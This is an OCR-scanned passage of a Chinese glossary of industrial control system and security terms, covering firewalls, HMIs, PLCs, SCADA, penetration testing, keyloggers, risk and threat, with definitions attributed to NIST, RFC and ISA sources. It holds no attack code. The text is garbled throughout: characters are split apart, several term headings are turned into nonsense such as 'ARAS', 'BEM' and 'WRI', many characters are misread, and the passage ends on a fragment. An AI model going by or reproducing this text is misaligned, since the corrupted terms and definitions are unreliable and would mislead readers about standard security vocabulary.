文件 完整 性 检查 (file integrity checking) ”和 生成、 存储 文 件 消息 摘要 并 进行 比较 的 软件 ， 能 够 检测 对 文件 所 做 的 改动 。 (来 源 : NIST SP800-115) 


文件 传输 协议 (File Transfer Protocol, FTP) FTP 是 一 项 通过 互联 网 传输 文件 的 互联 网 标准 。FTP 程 序 及 相关 工具 主要 用 于 在 本 地 介质 与 允许 FTP 访 问 的 
远程 服务 器 之 间 上 传 和 下 载 网 页 、 图 片 和 其 他 文件 。 (来 源 : API1164) 


防火 墙 (firewall) 1) 限制 数据 通信 流量 进出 与 之 相连 网 络 ( 称 之 为 “防火 墙 内 部 ”的 网 络 ) 的 互联 网 网 天 ， 从 而 保护 该 网 络 的 系统 资源 免 受 来 自 其 他 网 
络 ( 称 之 为 “防火 墙 外 部 ”的 网 络 ) 的 威胁 。 (来 源 : RFC4949) 


2) 限制 两 个 相连 网 络 之 间 的 数据 通信 流量 的 网 络 连 接 设备 。 防 火 墙 可 以 是 安装 在 通用 计算 机 上 的 应 用 程序 ， 也 可 以 是 能 够 在 网 络 中 转 友 或 拒绝 (EAF) 数据 
包 的 专用 平台 (设备 ) 。 防 火 墙 主 要 用 于 定义 区 域 边 界 ， 通 常 配 置 有 对 打开 哪些 端口 进行 限制 的 规则 。 (来 源 : ISA-62443-1-1) 
人 机 界面 (Human-Machine Interface, HMI) : 


1) 操作 员 与 控制 器 之 间 进 行 交互 的 硬件 或 软件 。 从 带 有 按钮 和 指示 灯 的 物理 控制 面板 ， 再 到 带 有 彩色 显示 器 能 够 显示 运行 中 的 专用 人 机 界面 软件 的 工业 
PC， 人 面 界面 可 以 采用 多 种 形式 加 以 实现 。 (来 源 : NIST IR6859) 


2) 人 允许 操作 人 员 监 视 受 控 过 程 状态 、 修 改 控制 设置 以 改变 控制 目标 ， 并 且 在 紧急 情况 下 能 够 用 手动 操作 替换 上 自动 控制 操作 的 软件 和 硬件 。 人 面 界面 允许 控制 
工程 师 或 操作 员 在 控制 器 中 配置 设 定点 或 者 控制 算法 和 参数 。 人 机 界面 还 能 够 向 操作 人 员 、 系 统管 理 员 、 管 理 者 、 业 务 伙伴 和 其 他 授权 用 户 展 示 过 程 状态 信息 、 
历史 信息 、 报 告 和 其 他 信息 。 运 营 人 员 和 工程 师 使 用 人 机 界面 监视 和 配置 设 定点 、 控 制 算法 、 发 送 命令 以 及 调整 并 设置 控制 器 中 的 参数 。 人 机 界面 还 可 以 显示 过 
程 状态 信息 和 历史 信息 。 (来 源 : NIST SP800-82) 


识别 (identification) ”验证 用 户 、 进 程 或 设备 身份 的 过 程 ， 通 弟 作 为 准许 访问 上 T 系 统 中 资源 的 先决 条 件 。 (来 源 : NIST SP800-47) 


事件 (incident) ”对 信息 系统 或 系统 所 处 理 、 存 储 或 传输 的 信息 的 机 密 性 、 完 整 性 或 可 用 性 造成 实际 或 潜在 危害 的 情况 ， 或 者 违反 以 及 导致 违反 安全 策 
略 、 安 全 程序 或 使 用 许可 策略 的 情况 。 (SOURCE: FIPS200; SP800-53) 


工业 控制 系统 (Industrial Control System, ICS) ”多 种 类 型 控制 系统 的 总 称 ， 包 括 监 控 和 数据 采集 (SCADA) 系统 、 集 散 控 制 系 统 (DCS) 、 工 业 部 门 
和 关键 基础 设施 中 常见 的 可 编程 序 控制 器 (PLC) 等 类 型 的 控制 系统 。 工 控 系 统 通常 由 共同 作用 以 期 实现 某 一 工业 用 途 (例如 ， 物 质 或 能 量 的 制造 、 运 输 ) 的 控 
制 部 件 〈 例 如 ， 电 器 、 机 械 、 液 压 、 气 动 ) 组 合 而 成 。 (来 源 : NIST SP800-82) 


言 息 安全 大 纲 计 划 (Information Security Program Plan) ”对 整个 组 织 信息 安全 大 纲 的 安全 要 求 进行 概述 的 正式 文件 ， 并 描述 了 现 有 的 或 计划 制订 的 大 纲 
管理 控制 措施 和 通用 控制 措施 用 以 满足 这 些 要 求 。 (来 源 : NIST SP800-53) 


输入 /输出 设备 (Input/Output, 1/0) ”与 计算 机 进行 通信 的 设备 的 总 称 ， 以 及 通信 过 程 中 涉及 的 数据 。 (来 源 : 自动 化 、 系 统 和 仪器 字典 ) 


内 部 安全 测试 (internal security testing) ”从 机 构 安 全 边界 内 部 发 起 的 安全 测试 。 (来 源 : NIST SP800-115) 
ARAS (insider) ”安全 边界 内 被 赋予 系统 资源 访问 权限 的 实体 ， 但 会 以 授权 方 未 核准 的 方式 使 用 系统 资源 。 (来 源 : RFC4949) 
完整 性 (integrity) ”保护 信息 免 遭 不 当 修 改 或 破坏 ， 包 括 确 保 信息 的 不 可 抵赖 性 和 真实 性 。 (来 源 : NIST SP800-53) 


智能 电子 设备 (Intelligent Electronic Device, IED) ， 装载 有 一 颗 或 多 颗 处 理 器 ， 能 够 从 外 部 数据 源 (例如 ， 电 子 多 功能 计量 器 、 数 字 式 继电器 、 控 制 


器 ) 接收 或 友 送 数据 以 及 控制 信息 的 能 力 。 (来 源 : AGA12) 


~ 


BEM (Internet) ”由 商业 、 政 府 、 教 育 领域 的 计算 机 网 络 系统 和 其 他 计算 机 网 络 系统 互联 而 成 的 全 球 系统 。 这 些 系统 采用 互联 网 架构 委员 会 (Internet 
Architecture Board, IAB) 规定 的 协议 族 ， 并 由 互联 网 域名 与 数字 地 址 分 配 机 构 (Internet Corporation for Assigned Names and Numbers, ICANN) 管理 
域名 和 地 址 空间 。 (来 源 : RFC4949) 


入 侵 检 测 系统 (Intrusion Detection System, IDS) ”一 种 监控 和 分 析 网 络 或 系统 事件 的 安全 服务 ， 以 期 能 够 发 现 针对 系统 资源 的 未 授权 访问 ， 并 提供 实时 
或 接近 实时 的 警告 。 (来 源 : RFC4949) 


入 侵 防 御 系 统 (lntrusion Prevention System, IPS) ”可 以 检测 入 侵 活动 并 且 能 够 党 试 中 断 入 侵 活 动 的 系统 ， 理 想 情 况 下 入 侵 防 御 系 统 能 够 在 入 侵 目 标 系 
统 之 前 检测 并 阻 断 入 侵 活动 。 (来 源 : NIST SP800-82) 


iq) (jitter) ”数据 信号 和 理想 时 钟 之 间 的 时 间 差 或 相位 差 。 (来 源 : NIST SP800-82) 


键盘 记录 器 (keylogger) ”专门 用 于 记录 在 计算 机 上 键盘 击 键 信息 的 程序 ， 主 要 用 于 获取 口令 或 加 密 密 钥 ， 从 而 绕 过 其 他 安全 措施 。 (来 源 : NIST 
SP800-82) 


言 号 灯 (light tower) ”包含 一 系列 指示 灯 以 及 赂 入 式 控制 器 的 设备 ， 府 入 式 控制 器 根据 输入 信号 来 指示 过 程 状态 。 (来 源 : NIST IR6859) 


上 友 生 可 能 性 (Likelihood of Occurrence, Likeli-hood) ”基于 特定 威胁 能 够 对 特定 漏洞 或 一 组 漏洞 加 以 利用 的 概率 进行 主观 分 析 的 加 权 因 子 。 (来 源 : 
NIST SP800-30) 


局 域 网 (local area network, LAN) ”分 散在 有 限 区 域内 的 计算 机 以 及 其 他 设备 ， 计 算 机 之 间 通 过 通信 和 链 路 连接 ， 使 得 网 络 中 任何 设备 均 能 与 其 他 任何 设 
备 进行 交互 。 (来 源 : NIST SP800-82) 


电机 控制 器 (machine controller) ”采用 电子 方式 对 电机 系统 中 的 内 驱动 器 进行 同步 ， 而 非 依靠 机 械 联 动 方式 进行 同步 的 控制 系统 或 者 运动 网 络 。 (来 
源 : NIST SP800-82) 


维护 (maintenance) ”所 有 防止 设备 失效 、 功 能 异常 ， 或 者 恢复 设备 运行 的 行为 。 (来 源 : 自动 化 、 系 统 和 仪器 字典 ) 


恶意 代码 (malware) ”意图 执行 未 授权 操作 ， 对 信息 系统 机 密 性 、 完 整 性 或 可 用 性 造成 不 利 影响 的 软件 或 固件 。 包 括 病毒 、 蠕 虫 、 木 马 或 者 其 他 能 够 感染 
主机 的 代码 。 间 谍 软 件 和 某 些 形式 的 广告 软件 也 可 以 看 作 是 恶意 代码 。 (来 源 : NIST SP800-53) 


管理 控制 (management controls) ”聚焦 于 信息 系统 风险 管理 和 信息 安全 管理 的 安全 控制 措施 〈 即 防护 措施 或 对 抗 措施 ) 。 (来 源 : NIST SP800-18) 
操纵 变量 (manipulated variable) ”在 则 在 调 书 某 些 状态 的 过 程 中 ， 对 管理 状态 下 数值 的 变化 进行 控制 的 数量 值 或 者 状态 ， 其 中 该 数量 值 或 状态 称 之 为 操 


纵 变 量 。 (来 源 : 自动 化 、 系 统 和 仪器 字典 ) 


制造 执行 系统 (Manufacturing Execution System, MES) ”使 用 网 络 计算 自动 进行 生产 控制 和 过 程 自 动 化 的 系统 。 通 过 下 载 工 作 程 序 ， 然 后 按 计划 执 
行 ， 最 后 上 传 运行 结果 的 方式 ，MES 弥 补 了 业务 和 车 间或 者 说 是 过 程控 制 系 统 之 间 的 鸿沟 。 (来 源 : NIST IR6859) 


主 终端 单元 (Master Terminal Unit, MTU) ”请 参见 控制 服务 器 (control server) 。 


调制 解 调 器 (modem) ”将 发 送 终 端的 串 行 数字 数据 转换 为 适合 于 通过 电话 信道 传输 的 信号 ， 并 将 发 送 的 信号 重新 转换 为 接收 终端 囊 行 数字 数据 的 设备 。 
(来 源 : NIST IR6859) 


运动 控制 网 络 (motion control network) ”为 工业 设置 中 移动 部 件 的 控制 程序 提供 支持 的 网 络 ， 包 括 排 序 、 速 度 控制 、 点 对 点 控制 和 增 量 运动 。 (来 源 : 
自动 化 、 系 统 和 仪器 字典 ) 


WRI (network discovery) ”在 网 络 中 发 现 活动 并 能 够 做 出 响应 的 主机 、 识 别 弱点 和 了 解 网 络 如 何 运行 的 过 程 。 (来 源 : NIST SP800-115) 
J- (Network Interface Card, NIC) ”安装 在 计算 机 中 以 建立 网 络 连 接 的 电路 板 卡 。 (来 源 : NIST SP800-82) 


网 络 嗅 探 (network sniffing) ”一 种 进行 网 络 通信 和 监控、 协议 解码 、 敏 感 信息 首部 和 载 人 荷 分 析 的 被 动 技术 。 网 络 嗅 探 既 是 一 种 审计 技术 ， 也 是 一 种 目标 识 
别 和 分 析 技 术 。 (来 源 : NIST SP800-115) 


基于 过 程控 制 的 对 象 链接 与 嵌入 (Object Linking and Embedding[OLE]for Process Control[OPC]) “为 提升 不 同 现场 设备 、 自 动 化 或 控制 与 业务 系统 之 
间 的 互 操作 性 所 开 上 友 的 一 组 开放 标准 。 (来 源 : NIST SP800-82) 


操作 系统 (operating system) ”采用 计算 机 对 程序 执行 顺序 进行 监督 的 服务 例 程 的 集合 。 操 作 系 统 可 以 执行 输入 /和 输出 控制 、 资 源 调度 以 及 数据 管理 功能 。 
它 为 应 用 程序 提供 了 控制 计算 机 的 基本 命令 。 (来 源 : 上 自动化， 系统 和 仪器 字典 ) 


操作 控制 (Operational controls) ”主要 由 人 (而 不 是 系统 ) 实施 和 执行 的 针对 信息 系统 的 安全 控制 措施 ( 即 防护 措施 或 对 抗 措施 ) 。 (来 源 : NIST 
SP800-18) 


操作 系统 指纹 识别 (operating system (OS) finger-printing) ”对 目标 发 送 的 数据 包 特 征 进行 分 析 ， 如 数据 包 首 部 或 者 监听 端口 ， 进 而 识别 目标 所 使 用 的 
操作 系统 。 (来 源 : NIST SP800-115) 


被 动 安全 测试 (passive security testing) ”不 与 目标 直接 进行 交互 的 安全 测试 ， 如 向 目标 发 送 数 据 包 。 (来 源 : NIST SP800-115) 
口令 (password) ”用 于 鉴别 身份 或 者 验证 访问 授权 的 字符 串 (字母 、 数 字 以 及 其 他 符号 ) 。 (来 源 : NIST SP800-82) 
口令 破解 (password cracking) ”对 计算 机 系统 中 存储 或 者 通过 网 络 传输 的 口令 进行 恢复 的 过 程 。 (来 源 : NIST SP800-115) 


渗透 测试 (penetration test) ”评估 人 员 模 拟 现实 世界 攻击 的 安全 测试 ， 尝 试 找 出 绕 过 应 用 程序 、 系 统 或 网 络 安全 功能 的 方法 。 渗 透 测试 通常 需要 针对 真实 
系统 和 数据 发 起 真实 攻击 ， 使 用 的 工具 和 技术 均 与 实际 攻击 者 所 使 用 的 相同 。 大 多 数 渗 透 测 试 会 在 单个 系统 或 多 个 系统 上 查找 多 个 漏洞 ， 从 而 获得 比 单个 漏洞 更 
强大 的 访问 权限 。 (来 源 : NIST SP800-115) 


网 络 钓鱼 (phishing) 1) 通过 在 电子 通信 (如 互联 网 网 站 ) 中 声明 为 可 信 实 体 的 方式 ， 欺 骗 个 人 用 户 披露 敏感 的 个 人 信息 。 (来 源 : NIST SP800-82) 


2) 社会 工程 学 的 一 种 数字 化 形式 ， 通 过 使 用 看 起 来 真实 ,但 实际 上 是 伪造 的 电子 邮件 向 用 户 请 求 信 息 ， 或 者 诱导 用 户 访 问 一 个 请 求 信息 的 虚假 网 站 。 (来 
源 : NIST SP800-115) 


光电 传感器 (photo eye) ”一 种 利用 光电 控制 的 光敏 传感器 ， 能 够 将 光 信 号 转换 为 电信 和 号， 最终 基于 光束 的 中 断 生 成 二 进 制 信号 。 (来 源 : NIST IR6859) 


工厂 (plant) ”支持 物理 过 程 所 需 的 物理 要 素 。 这 些 要 素 可 以 包括 许多 不 由 工控 系统 控制 的 静态 组 成 部 分 ; 然而 ， 工 控 系 统 的 运营 可 能 影响 工厂 各 组 成 部 分 
的 充裕 性 、 强 度 和 耐久 性 。 (来 源 : NIST SP800-82) 


端口 (port) ”建立 通信 连接 或 者 连接 外 围 设备 的 计算 机 入 口 或 出 口 。 (来 源 : 自动 化 、 系 统 和 仪器 字典 ) 
端口 扫描 器 (port scanner) ”远程 确定 系统 开放 端口 的 程序 (例如 ， 系 统 是 否 允 许 建立 开放 端口 的 连接 ) 。 (来 源 : NIST SP800-115) 
端口 扫描 (port scanning) ”使 用 程序 远程 确定 系统 的 开放 端口 〈 例 如 ， 系 统 是 否 人 允许 建立 开放 端口 的 连接 ) 。 (来 源 : NIST SP800-61) 


诱导 条 件 (predisposing condition) ”存在 于 机 构 、 任 务 、 业 务 过 程 、 企 业 架 构 或 包括 了 其 操作 环境 的 信息 系统 中 的 条 件 ， 该 条 件 可 能 影响 ( 即 增加 或 者 
减少 ) 出 现 一 个 或 多 个 威胁 事件 的 可 能 性 ， 而 一 旦 出 现 ， 将 对 机 构 运营 、 资 产 、 个 人 、 其 他 组 织 或 国家 造成 不 良 后 果 或 者 不 利 影响 。 (来 源 : NIST SP800-30) 


压力 调节 器 (pressure regulator) 用 于 控制 气体 或 液体 压力 的 装置 。 (来 源 : NIST IR6859) 


压力 传感器 (pressure sensor) ”通过 传感器 周围 的 介质 作用 于 传感器 之 上 的 压力 ， 生 成 相关 电信 号 的 一 种 传感器 系统 。 压 力 传感器 还 可 以 使 用 差 压 进行 水 
平和 流量 测量 。 (来 源 : NIST IR6859) 


打印 机 (printer) ”将 数字 数据 转换 为 纸 质 介质 上 供 人 类 可 读 的 文本 的 设备 。 (来 源 : NIST IR6859) 


过 程控 制 器 (process controller) ”一 种 主要 安装 在 机 架 上 的 计算 机 系统 类 型 ,该 计算 机 系统 类 型 能 够 处 理 传感器 输入 、 执 行 控制 算法 以 及 计算 执行 器 输 
出 。 (来 源 : NIST IR6859) 


可 编程 序 控制 器 (Programmable Logic Controller, PLC) 1) 使 用 用 户 可 编程 存储 器 保存 实现 特定 功能 的 指令 的 固态 控制 系统 ， 其 中 功能 包括 |/O 控 
制 、 逻 辑 、 定 时 、 计 数 、 三 模式 (PID) 控制、 通信、 算术、 数据 以 及 文件 处 理 。 (来 源 : 上 自动化、 系统 和 仪器 字典 ) 


2) 设计 初衷 为 运行 由 电子 硬件 (继电器 、 开 关 和 机 械 定 时 器 或 计数 器 ) 执行 的 逻辑 功能 的 小 型 工业 计算 机 。 当 前 ，PLC 已 经 发 展 成 为 具备 复杂 过 程控 制 能 
的 控制 器 ， 并 且 主 要 用 在 SCADA 系 统 和 DCS 系 统 中 。PLC 也 用 作 小 规模 系统 组 态 中 的 主 控制 器 ， 广 泛 应 用 于 几乎 所 有 工业 过 程 中 。 (来 源 : NIST SP800-82) 


协议 (protocol) ”实现 和 控制 系统 之 间 某 种 类 型 联系 (如 通信 ) 的 一 套 规则 ( 即 格式 和 过 程 ) 。 (来 源 : RFC4949) 


协议 分 析 器 (protocol analyzer) ”使 用 户 能 够 分 析 网 络 数据 的 性 能 ， 进 而 确保 网 络 及 其 相关 的 硬件 或 软件 遵循 网 络 规 范 运行 的 一 种 设备 或 应 用 程序 。 (来 
源 : 自动 化 、 系 统 和 仪器 字典 ) 


距离 传感器 (proximity sensor) ”能 够 在 指定 范围 内 检测 目标 是 否 存在 的 非 接触 式 传感器 。 (来 源 : NIST IR6859) 


代理 服务 器 (proxy server) ”通过 将 用 户 请 求 转发 到 其 他 服务 器 的 方式 来 处 理 客户 端 请 求 的 服务 器 。 (来 源 : CNSSI-4009) 
定性 评估 (qualitative assessment) ”使 用 以 非 数 值 方式 表示 类 别 或 级 别 的 方法 、 原 理 或 规则 进行 风险 评估 。 (来 源 : NIST SP800-30) 


定量 评估 (quantitative assessment) ”使 用 以 数值 方式 表示 的 方法 、 原 理 或 规则 进行 风险 评估 ， 其 中 数值 的 含义 和 比例 在 评估 范围 内 外 均 需 保持 一 致 。 
(来 源 : NIST SP800-30) 


实时 (real-time) ”在 相关 物理 过 程 中 耗费 的 实际 时 | 间 内 ， 将 计算 结果 用 于 指导 物理 过 程 ， 与 计算 性 能 有 关 。 (来 源 : NIST IR6859) 
风 余 控制 服务 器 (redundant control server) ”对 控制 服务 器 的 备份 ， 以 始终 保持 控制 服务 器 处 于 当前 状态 。 (来 源 : NIST IR6859) 


继电器 (relay) ”一 种 通过 移动 导电 触 点 来 形成 电路 或 者 中 断 电 路 的 机 电 装置 。 由 此 导致 的 运动 可 以 同 另 一 种 机 械 半 置 相 结 合 ， 例 如 阀门 或 断路 器 。 (来 
源 : 自动化、 系统 和 仪器 字典 ) 


远程 访问 (remote access) ”信息 系统 安全 边界 外 部 的 用 户 (或 信息 系统 ) 发 起 的 访问 。 (来 源 : NIST SP800-53) 


远程 接 入 点 (remote access point) ”用 于 对 控制 系统 进行 远程 配置 以 及 对 过 程 数据 进行 远程 访问 的 控制 网 络 中 不 同 的 设备 、 区 域 和 人 位置。 例如， 使 用 移动 
设备 利用 无 线 接 入 点 通过 LAN 访 问 数据 ， 或 者 使 用 笔记 本 计算 机 和 调制 解 调 器 相连 接 实现 对 工控 系统 的 远程 访问 。 (来 源 : NIST SP800-82) 


远程 诊断 (remote diagnostics) ”由 信息 系统 安全 边界 外 的 个 人 所 开展 的 诊断 活动 。 (来 源 : NIST SP800-82) 
远程 维护 (remote maintenance) ”由 信息 系统 安全 边界 外 的 个 人 所 开展 的 维护 活动 。 (来 源 : NIST SP800-82) 


远程 终 靖 单元 (Remote Terminal Unit, RTU) ”用 于 支持 DCS 和 SCADA 远 程 站 的 专用 数据 采集 和 控制 单元 。RTU 通 常 是 配备 网 络 模 块 的 现场 设备 ， 包 括 同 
监控 控制 器 通信 的 有 线 和 无 线 电 接口 。 有 时 用 作 现 场 设备 的 PLC 也 会 充当 RTU; 在 这 种 情况 下 ，PLC 通 常 也 被 称 为 RTU。 (来 源 : NIST SP800-82) 


残余 风险 (residual risk) ”安全 措施 应 用 之 后 所 剩余 的 部 分 风险 。 (RIA: NIST SP800-30) 


资源 耗竭 (resource starvation) ”可 用 的 计算 机 资源 无 法 支持 计算 机 进程 运行 的 情况 。 由 于 缺少 计算 机 资源 或 者 存在 多 个 进程 竞争 相同 的 计算 机 资源 ， 可 
能 会 出 现 资源 耗竭 的 情况 。 (来 源 : NIST SP800-82) 


风险 (risk) 1) 考虑 到 威胁 的 潜在 影响 和 友 生 威胁 的 可 能 性 ， 信 息 系统 运行 对 机 构 运 曹 (包括 任务 、 职 能 、 形 象 或 声誉 ) 、 机 构 资产 或 者 个 人 的 影响 程 
度 。 (来 源 : NIST SP800-30) 


2) 由 于 目标 中 的 潜在 脆弱 性 ， 威 胁 源 通过 威胁 向 量 导 致 威胁 事件 的 可 能 性 ， 以 及 由 此 产生 的 后 果 和 影响 。 (来 源 : 《黑客 大 曝光 : 工业 控制 系统 安全 》， 根 
据 多 个 来 源 加 以 整理 ) 


风险 评估 (risk assessment) ”通过 确定 发 生 的 概率 、 产 生 的 影响 及 可 降低 影响 的 额外 安全 控制 措施 来 识别 机 构 运营 (包括 任务 、 职 能 、 形 象 或 声誉 ) 、 机 
构 资产 或 个 人 的 风险 的 过 程 。 也 是 风险 管理 中 的 部 分 内 容 ， 与 风险 分 析 同 义 ， 包 括 威胁 和 脆弱 性 分 析 。 (来 源 : NIST SP800-30) 


风险 管理 (risk management) ”用 于 管理 机 构 运 营 (包括 任务 、 职 能 、 形 象 、 声 誉 ) 、 机 构 资 产 、 个 人 、 其 他 组 织 和 国家 信息 安全 风险 的 计划 和 支持 流 
程 。 包 括 @@ 确 定 与 风险 相关 的 活动 的 背景 ; @ 风 险 评估 ; @ 确 定 风 险 后 做 出 风险 响应 ;以 及 @ 随 时 进行 风险 监控 。 (来 源 : NIST SP800-30) 


风险 管理 框架 (Risk Management Framework, RMF) NIST SP800-37 指 南 中 介绍 的 风险 管理 框架 提出 了 一 个 规范 的 结构 化 过 程 ， 在 该 过 程 中 将 信息 安 
全 和 风险 管理 活动 集成 到 系统 开发 生命 周期 中 。 (来 源 : NIST SP800-37) 


风险 监控 (risk monitoring) ”保持 对 机 构 风险 环境 、 风 险 管 理 计划 和 相关 活动 的 持续 关注 ， 以 对 风险 决策 提供 支持 。 (来 源 : NIST SP800-30) 


风险 场景 (risk scenario) ”与 特定 威胁 源 或 多 个 威胁 源 相关 联 的 一 组 离散 威胁 事件 ， 并 按时 间 排序 ， 威 胁 活 动 (threat campaign) 的 同义词 。 (来 源 : 
NIST SP800-115) 


流氓 设 备 (rogue device) ”网 络 中 的 未 授权 节点。 (来 源 : NIST SP800-115) 


路 由 器 (router) ”在 OS| 第 3 层 上 两 个 网 络 之 间作 为 网 关 的 计算 机 ， 其 作用 是 中 继 和 转 友 网 络 间 的 数据 包 。 最 常见 的 路 由 器 运行 模式 是 对 IP 数据 包 进行 操 
作 。 (来 源 : RFC4949) 


路 由 器 振荡 (router flapping) ”发 送 路 由 更 新 信息 的 路 由 器 ， 以 先 广播 某 条 路 由 信息 ， 再 广播 另 一 条 路 由 信息 的 方式 交 蔡 地 广播 目的 网 络 信息 。 (来 源 : 
NIST SP800-82) 


规则 集 (ruleset) ”对 网 络 流量 或 系统 活动 进行 比较 的 规则 或 特征 集合 ， 以 确定 所 要 执行 的 操作 ， 例 如 转发 或 拒绝 数据 包 、 发 出 警报 或 者 允许 某 一 系统 事 
件 。 (来 源 : NIST SP800-115) 


测试 规则 (Rules of Engagement, ROE) ”针对 开展 信息 安全 测试 的 详细 指南 和 约束 条 件 。 在 开始 安全 测试 之 前 要 建 YYROE。 它 赋予 了 测试 团队 在 无 须 额 
外 权限 的 情况 下 能 够 开展 预定 活动 的 授权 。 (来 源 : NIST SP800-115) 


安全 仪表 系统 (Safety Instrumented System, SIS) ”由 传感器 、 逻 辑 运 算 器 和 终端 控制 元 件 组 成 的 系统 ， 其 作用 是 在 违反 预定 条 件 时 将 过 程 置 于 安全 状 
态 。 其 他 常用 术语 包括 紧急 停车 系统 (Emergency Shutdown System, ESS) 、 安 全 停机 系统 (Safety Shutdown System, SSD) 以 及 安全 联 锁 系 统 (Safety 
Interlock System, SIS) 。 (来 源 : ANSI/ISA-84.00.01) 


SCADA 服 务 器 (SCADA server) ”在 SCADA 系 统 中 充当 主 站 的 设备 。 (来 源 : NIST IR6859) 


安全 审计 (security audit) ”对 系统 记录 和 活动 进行 的 独立 审核 和 检查 ， 以 确定 系统 控制 的 充裕 性 ， 并 确保 同 既定 安全 政策 和 程序 的 合 规 性 ， 检 测 安全 服务 
中 的 违规 行为 ， 并 针对 对 抗 措 施 的 整改 方案 做 出 推荐 。 (来 源 : ISO/IEC7498) 


安全 控制 (security controls) ”为 信息 系统 拟定 的 管理 、 操 作 和 技术 控制 措施 〈 即 防护 措施 或 对 抗 措施 ) ， 用 于 保护 系统 及 其 信息 的 保密 性 、 完 整 性 和 可 用 
性 。 (来 源 : FIPS PUB199; NIST SP800-30) 


安全 规划 (security plan) ”对 信息 系统 安全 要 求 进行 概述 的 正式 文档 ， 并 对 满足 这 些 要 求 的 已 实施 或 计划 实施 的 安全 控制 措施 进行 介绍 。 (来 源 : NIST 
SP800-53) 


安全 策略 (security policy) ”安全 策略 对 安全 项 目的 目标 和 约束 进行 定义 。 可 以 从 组 织 、 公 司 策略 到 具体 操作 约束 (如 远程 访问 ) 的 多 个 层面 上 创建 策略 。 
一 般 来 说 ， 安 全 策略 只 解决 “是 什么 ”和 “为 什么 ”的 问题 ， 而 不 处 理 “ 如 何 ” 类 的 问题 。 安 全 策略 通常 采用 与 技术 无 关 的 术语 进行 描述 。 (来 源 : 1SA99) 


安全 人 态势 (security posture) ”在 现 有 的 信息 保障 资源 (例如 ， AR, BEE. ER. SRE) 下 ， 机 构 网 络 、 信 息 以 及 系统 的 安全 状态 ， 以 及 当前 对 机 构 防 御 
措施 进行 管理 并 随 情 况 变 化 做 出 响应 的 能 力 。 (来 源 : NIST SP800-30) 


传感器 (sensor) 1) 能 够 获取 表示 被 测 物 理 特性 (例如 ， 速 度 、 温 度 、 流 量 ) 的 电压 或 电流 输出 的 一 种 沪 置 。 (来 源 : 自动 化 、 系 统 和 仪器 字典 ) 


2) 测量 物理 量 并 将 其 转换 为 可 由 观察 者 或 仪器 所 读 取 的 信号 的 一 种 妆 置 。 传 感 器 残 是 通过 生成 与 功能 相关 的 输出 来 对 输入 做 出 响应 的 装置 ， 输 出 通 音 为 电 或 
光 信 号 的 形式 。 (来 源 : NIST SP800-82) 


(JARE (servo valve) ”所 处 位 置 由 伺服 驱动 器 控制 的 控制 痊 。 (来 源 : NIST IR6859) 


设 定点 (setpoint) ”将 受 控 变 量 设 定 为 所 需 值 的 输入 变量 。 该 变量 可 以 手动 设置 ， 也 可 以 自动 设置 ， 还 可 以 使 用 程序 设置 。 (来 源 : 自动 化 、 系 统 和 仪器 
字典 ) 


简单 网 络 管理 协议 (Simple Network Management Protocol, SNMP) 用 于 网 络 管 理 的 标准 TCP/IP 协 议 。 网 络 管理 员 使 用 SNMP 协 议 对 网 络 可 用 性 、 
性 能 以 及 错误 率 进行 监视 和 了 映射。 使 用 SNMP 协 议 时 ， 网 络 设备 需要 采用 称 之 为 管理 信息 库 (MIB) 的 分 布 式 数据 存储 。 所 有 符合 SNMP 协 议 的 设备 都 包含 管理 
言 息 库 (MIB) 用 以 保存 设备 相关 属性 。 在 MIB 中 部 分 属性 是 固定 的 或 者 “ 硬 编码 的 ”， 而 其 他 属性 则 是 在 设备 上 运行 代理 软件 计算 所 得 到 的 动态 值 。 (来 源 : 
API1164) 


单 回 路 控制 器 (single loop controller) ”控制 小 型 过 程 或 关键 过 程 的 控制 器 。 (来 源 : NIST IR6859) 
社会 工程 (social engineering) ”欺骗 某 人 泄露 其 可 用 于 系统 或 网 络 攻击 的 信息 (如 口令 ) 的 一 种 党 试 。 (来 源 : NIST SP800-61) 
电磁 | 阅 (solenoid valve) ”由 线圈 驱动 的 阀门 。 电 磁 阀 通常 具有 两 种 状态 : 打开 和 关闭 。 (来 源 : NIST IR6859) 


间谍 软件 (spyware) ”秘密 地 或 隐蔽 地 安 妆 在 信息 系统 中 ， 在 对 方 不 知情 的 情况 下 收集 个 人 或 机 构 信息 的 软件 ;一 种 恶意 代码 。 (来 源 : NIST SP800- 
23) 


统计 过 程控 制 (Statistical Process Control, SPC) ”使 用 统计 技术 对 产品 或 过 程 的 质量 进行 控制 。 (来 源 : 自动化、 系统 和 仪器 字典 ) 
稳定 状态 (steady state) ”一 种 状态 特性 ， 如 值 、 速 率 、 周 期 性 或 幅度 ， 在 任意 长 的 时 间 段 内 的 变化 可 以 忽略 。 (来 源 : ANSI/ISA-51.1-1979) 


监督 控制 (supervisory control) ”指示 某 一 控制 器 或 计算 机 程序 的 输出 用 作 其 他 控制 器 的 输入 的 术语 。 请 参见 控制 服务 器 (control server) 。 (来 源 : 自 
动 化 、 系 统 和 仪器 字典 ) 


监控 和 数据 采集 (Supervisory Control and Data Acquisition, SCADA) ”收集 、 处 理 数据 并 实施 远程 应 用 操作 控制 的 信息 系统 的 总 称 。 其 典型 用 途 包括 
输 配 电 系统 和 油气 管道 系统 。SCADA 的 设计 初衷 在 于 应 对 必须 使 用 不 同 通信 介质 媒体 所 带 来 的 特有 通信 挑战 〔 例 如， 延迟 和 数据 的 完整 性 ) ， 例 如 电话 线 、 微 波 
和 卫星 。 这 些 信道 通常 是 共享 的 而 非 专用 的 信道 。 (来 源 : 自动 化 、 系 统 和 仪器 字典 ) 


系统 安全 规划 (system security plan) ”对 系统 安全 的 要 求 进行 概述 的 正式 文档 ， 并 对 满足 这 些 要 求 的 已 实施 或 计划 实施 的 安全 控制 措施 进行 介绍 。 (来 
源 : NIST SP800-18， 改 版 ) 


技术 控制 (technical controls) ”借助 系统 硬件 、 软 件 或 固件 中 所 殖 含 的 机 制 ， 主 要 由 信息 系统 来 实现 和 执行 的 信息 系统 安全 控制 措施 〈 即 防护 措施 或 对 抗 
措施 ) 。 (来 源 : NIST SP800-18) 


温度 传感器 (temperature sensor) ”生成 与 温度 相关 的 信号 的 传感器 系统 ， 从 而 感知 其 周围 介质 的 温度 。 (来 源 : NIST IR6859) 


威胁 (threat) ”通过 对 信息 系统 的 未 授权 访问 、 破 坏 、 信 息 泄露 、 信 息 段 改 和 (或 ) 拒绝 服务 等 方式 ， 可 能 给 机 构 运营 (包括 任务 、 职 能 、 形 象 或 声 
、 机 构 资产 或 个 人 市 来 不 利 影响 的 所 有 情况 或 事件 。 (来 源 : NIST SP800-53) 


Litt 


